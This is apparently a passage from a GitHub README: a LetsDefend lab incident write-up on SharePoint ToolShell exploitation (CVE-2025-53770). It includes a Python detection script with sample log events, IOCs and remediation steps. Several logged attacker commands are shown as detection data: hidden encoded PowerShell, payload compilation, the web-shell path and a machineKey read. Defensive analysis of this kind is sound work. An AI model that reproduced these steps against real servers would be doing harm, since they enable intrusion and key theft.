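    #    ("JABjAGYAZwA9AC4ALgAuAA==" is UTF-16LE "$cfg=...", a placeholder, not the real payload).
    {"id": 1, "time": "2025-07-22T13:07:11Z", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "user": r"IIS APPPOOL\SharePoint",
     "cmdline": "powershell.exe -nop -w hidden -e JABjAGYAZwA9AC4ALgAuAA=="},
    # 2. Command 1: on-host compilation of payload.cs into C:\Windows\Temp
    {"id": 1, "time": "2025-07-22T13:07:20Z", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "user": r"IIS APPPOOL\SharePoint",
     "cmdline": r"csc.exe /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"},
    # 3. Command 2: cmd.exe writing the web shell into LAYOUTS
    {"id": 11, "time": "2025-07-22T13:07:31Z", "image": r"C:\Windows\System32\cmd.exe", "user": r"IIS APPPOOL\SharePoint",
     "target": r"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"},
    # 4. Command 3: machineKey read from the worker process
    {"id": 1, "time": "2025-07-22T13:07:45Z", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "user": r"IIS APPPOOL\SharePoint",
     "cmdline": 'powershell.exe -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"'},
    # Benign: ASP.NET dynamic compilation, also w3wp.exe -> csc.exe, but output goes to Temporary ASP.NET Files.
    {"id": 1, "time": "2025-07-22T12:58:03Z", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "user": r"IIS APPPOOL\SharePoint",
     "cmdline": r'csc.exe /noconfig /out:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\1a2b\App_Web_x.dll" /target:library'},
    # Benign: a SharePoint update writing a layouts page via msiexec, not via a shell.
    {"id": 11, "time": "2025-07-22T03:15:00Z", "image": r"C:\Windows\System32\msiexec.exe", "user": r"NT AUTHORITY\SYSTEM",
     "target": r"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\settings.aspx"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(e: dict) -> list[str]:
    """Return the names of every rule one event satisfies."""
    hits: list[str] = []
    image = basename(e.get("image", ""))
    parent = basename(e.get("parent", ""))
    cmd = e.get("cmdline", "")
    if e["id"] == 1:
        if parent == "w3wp.exe" and image in SHELLS:
            hits.append("web_worker_spawned_shell")
        if image == "powershell.exe" and ENCODED_FLAG.search(cmd):
            hits.append("encoded_powershell")
        if MACHINEKEY.search(cmd):
            hits.append("machinekey_access_in_cmdline")
        if image == "csc.exe" and parent in SHELL_OR_WORKER and CSC_TEMP_OUT.search(cmd):
            hits.append("csc_compile_to_windows_temp")
    elif e["id"] == 11:
        if image in SHELL_OR_WORKER and LAYOUTS_ASPX.search(e.get("target", "")):
            hits.append("aspx_written_to_layouts_by_shell")
    return hits


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> rule names, omitting events that trip nothing."""
    return {i: r for i, e in enumerate(events) if (r := rules_for(e))}


if __name__ == "__main__":
    for i, names in triage(EVENTS).items():
        print(EVENTS[i]["time"], basename(EVENTS[i].get("image", "")), ", ".join(names))
```

The two benign records are the point of the example: `w3wp.exe → csc.exe` on its own is normal ASP.NET behaviour and a patch legitimately writes `.aspx` files into `LAYOUTS`, so the rules key on the output path and on the writing process rather than on the compiler or the folder alone.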



## 🔍 Threat Intelligence Findings

**Source:** LetsDefend Threat Intel (queried by IP `107.191.58.76`)  
- Tagged with **CVE‑2025‑53770** and observed `Referer: /_layouts/SignOut.aspx`.  
**Interpretation:** The attacker likely spoofed legitimate SharePoint sign‑out traffic to mask malicious POST requests. Containment was initiated immediately.

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/2dd31059bfda2bfa1c96207ed87b38e8c258777c/Lets%20defend/Screenshot%202025-10-04%20150722.jpg)

---

## 🧩 Indicators of Compromise (IOCs)

| Type    | Indicator                                                                                                     | Description                                        |
|---------|---------------------------------------------------------------------------------------------------------------|----------------------------------------------------|
| IP      | `107.191.58.76`                                                                                               | Attacker source IP sending the exploit POST        |
| URL     | `/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx`                                                | Exploit endpoint (ToolShell auth bypass + RCE)     |
| Header  | `Referer: /_layouts/SignOut.aspx`                                                                             | Spoofed referer carried by the exploit request     |
| File    | `C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx`    | Deployed malicious ASPX web shell                  |
| File    | `C:\Windows\Temp\payload.cs`, `C:\Windows\Temp\payload.exe`                                                   | Source and binary compiled on the host             |
| Process | `csc.exe /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs`                                         | On-host compilation of the payload                 |
| String  | `MachineKeySection` / `GetApplicationConfig`                                                                  | Evidence of machineKey exfiltration attempt        |

---

## 🧾 Analyst Note (SOC-342)

- **Date/Time:** 2025-07-22 13:07  
- **Case ID:** SOC-342  
- **Host:** SharePoint01  
- **Severity:** 🔴 Critical  
- **Analyst:** `Victor`

### 📋 Summary
Detected **ToolShell** zero‑day exploitation (CVE‑2025‑53770) against on‑prem SharePoint (`SharePoint01`). The attacker (IP `107.191.58.76`) bypassed authentication with a crafted POST to `ToolPane.aspx` and performed multiple post‑exploit actions:

- Wrote `spinstall0.aspx` (web shell) into the SharePoint `LAYOUTS` directory.  
- Compiled `payload.exe` locally from `payload.cs` using the .NET C# compiler (`csc.exe`).  
- Executed PowerShell to read/exfiltrate ASP.NET **machineKey** values (`ValidationKey`/`DecryptionKey`).

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/2dd31059bfda2bfa1c96207ed87b38e8c258777c/Lets%20defend/Screenshot%202025-10-04%20131953.jpg)
![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/2dd31059bfda2bfa1c96207ed87b38e8c258777c/Lets%20defend/Screenshot%202025-10-04%20132449.jpg)
![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/2dd31059bfda2bfa1c96207ed87b38e8c258777c/Lets%20defend/Screenshot%202025-10-04%20132608.jpg)

**Conclusion:** Confirmed compromise — web‑shell deployment, key exfiltration, and on‑host payload compilation.

---

## 🧰 Containment & Remediation

### ✅ Recommended Actions
- **Contain:** Isolate `SharePoint01` (quarantine VLAN) and block the attacker IP at perimeter/WAF/firewall. If the server must stay online, confirm SharePoint's **AMSI integration** and Defender AV are enabled; that is Microsoft's interim mitigation for this CVE.  
- **Hunt:** Search all SharePoint servers (both the `15` and `16` hive `LAYOUTS` folders) for `spinstall*.aspx`, `payload.cs`/`payload.exe` (by filename and hash), and `GetApplicationConfig`/`MachineKeySection` usage in process command lines and web files.  
- **Eradicate:** Remove `spinstall0.aspx`, unauthorized scheduled tasks/services, and any detected malware (after collecting forensic copies).  
- **Mitigate:** Apply Microsoft's **July 2025 out-of-band security updates** to every on‑prem SharePoint server, then rotate the ASP.NET `machineKey` values (`Update-SPMachineKey` or Central Administration) and restart IIS (`iisreset`). Patching alone does not invalidate keys the attacker already stole, and rotating before patching leaves the new keys exposed to the same exploit.  
- **Detect & Prevent:**  
  - Add detections for encoded PowerShell (`-EncodedCommand` / `-e`) on web servers.  
  - Alert on `w3wp.exe` spawning `powershell.exe` or `cmd.exe`; a SharePoint worker process has no routine reason to do so.  
  - Alert on `csc.exe` compiling code in `C:\Windows\Temp` on web hosts (ASP.NET's own builds go to `Temporary ASP.NET Files`).  
  - Block unauthenticated large `POST` requests to `ToolPane.aspx`, and any request carrying `Referer: /_layouts/SignOut.aspx` to it, via WAF rules.

---

## 📚 Lessons Learned
- Zero‑day exploits commonly chain stages: **RCE → persistence → exfiltration**.  
- **MachineKey exfiltration** is a high‑risk indicator for SharePoint attacks — treat any attempt as critical.  
- Built‑in system binaries (`csc.exe`, `cmd.exe`, `powershell.exe`) are frequently abused post‑exploit; monitor for unexpected usage on web servers.  
- Rapid detection, containment, and forensic preservation are essential to limit impact.

---

## 📝 Quick responder checklist (summary)
1. Quarantine `SharePoint01` and block `107.191.58.76`.  
2. Collect forensic copies of `spinstall0.aspx`, `payload.cs`, `payload.exe` (preserve timestamps).  
3. Compute SHA256 hashes and submit to intel/EDR (if allowed).  
4. Dump memory of `w3wp.exe` / `payload.exe` for analysis.  
5. Hunt across infrastructure for the IOCs above.  
6. Rotate the ASP.NET `machineKey` values and affected credentials **after** evidence collection and patching, then restart IIS (`iisreset`) so the new keys take effect.  
7. Patch SharePoint immediately; consider host rebuild if persistence is confirmed.

---


File Snapshot

```text
/data/pocs/f6b689c76ea7f842a07b10e1f08a479789589ea4
├── Lets defend
│   ├── [141K] Abus.jpg
│   ├── [162K] Alert.jpg
│   ├── [116K] Case.jpg
│   ├── [102K] Event.jpg
│   ├── [ 85K] Screenshot 2025-09-29 133717.jpg
│   ├── [172K] Screenshot 2025-09-29 135646.jpg
│   ├── [197K] Screenshot 2025-09-29 140024.jpg
│   ├── [116K] Screenshot 2025-09-29 140231.jpg
│   ├── [ 83K] Screenshot 2025-09-29 141241.jpg
│   ├── [110K] Screenshot 2025-09-29 141653.jpg
│   ├── [263K] Screenshot 2025-09-29 152735.jpg
│   ├── [ 78K] Screenshot 2025-09-29 153925.jpg
│   ├── [ 98K] Screenshot 2025-09-29 154319.jpg
│   ├── [ 83K] Screenshot 2025-09-29 154445.jpg
│   ├── [ 60K] Screenshot 2025-09-29 154857.jpg
│   ├── [264K] Screenshot 2025-09-29 155002.jpg
│   ├── [109K] Screenshot 2025-09-29 155029.jpg
│   ├── [135K] Screenshot 2025-09-29 155055.jpg
│   ├── [110K] Screenshot 2025-09-29 155122.jpg
│   ├── [ 82K] Screenshot 2025-10-04 131953.jpg
│   ├── [ 89K] Screenshot 2025-10-04 132038.jpg
│   ├── [103K] Screenshot 2025-10-04 132449.jpg
│   ├── [150K] Screenshot 2025-10-04 132608.jpg
│   └── [ 40K] Screenshot 2025-10-04 150722.jpg
└── [ 25K] README.md

2 directories, 25 files
```